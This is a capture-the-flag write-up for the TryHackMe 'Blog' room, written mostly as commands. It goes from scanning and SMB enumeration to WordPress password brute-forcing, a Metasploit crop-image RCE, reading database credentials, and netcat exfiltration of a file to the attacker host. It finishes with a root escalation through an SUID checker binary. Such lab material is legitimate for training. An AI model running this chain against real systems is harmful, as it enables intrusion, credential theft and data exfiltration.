Blog
Room Link: https://tryhackme.com/room/blog
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/445 - SMB
Kali
smbclient -L //$VICTIM/
Kali
smbclient //$VICTIM/BillySMB
Kali
smbget -R smb://$VICTIM/BillySMB
Kali
steghide extract -sf check-this.png
cat rabbit_hole.txt 
TCP/80 - HTTP
If you go to http://$VICTIM/wp-admin the page redirects to a new page so I add blog.thm into my hosts file and then it worked.
Kali
wpscan --url http://blog.thm/ --enumerate u
Hydra was taking too long but wpscan was able to find it quickly.
Kali
wpscan --url http://blog.thm/ -U kwheel, bjoel -P /usr/share/wordlists/rockyou.txt
After logging in the user couldn't really do anything but I noticed wordpress is on version 5.0
Initial Shell
Kali
msfconsole
use exploit/multi/http/wp_crop_rce
set rhosts $VICTIM
set username kwheel
set password cutiepie1
run
shell
python2 -c 'import pty; pty.spawn("/bin/bash")'
id
Victim
grep -i pass *
Victim
mysql -u wordpressuser -p
Password: LittleYellowLamp90!@
show databases;
use blog;
show tables;
select * from wp_users;
Tried brute forcing the hashes, we got the password for kwheel again but they aren't a user on the actual server. bjoel I wasn't able to bruteforce.
Kali
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Found a pdf in bjoels home directory, after opening it up it looks like he was fired so his account is most likely locked anyways so there may be no point trying to break into it.
Kali(receiving)
cd /home/bjoel
nc -l -p 1234 > Billy_Joel_Termination_May20-2020.pdfVictim(sending)
nc -w 3 $KALI 1234 < Billy_Joel_Termination_May20-2020.pdf
Privilege Escalation
Victim
find / -perm -u=s -type f 2> /dev/null 
This script seems to just check if there is a admin environment variable is set, if it isn't it will exit.
Victim
cd /usr/sbin
ltrace checker
I add the admin environment variable then right away I got root after running the script
Victim
env
export admin=admin
env
/usr/sbin/checker
Last updated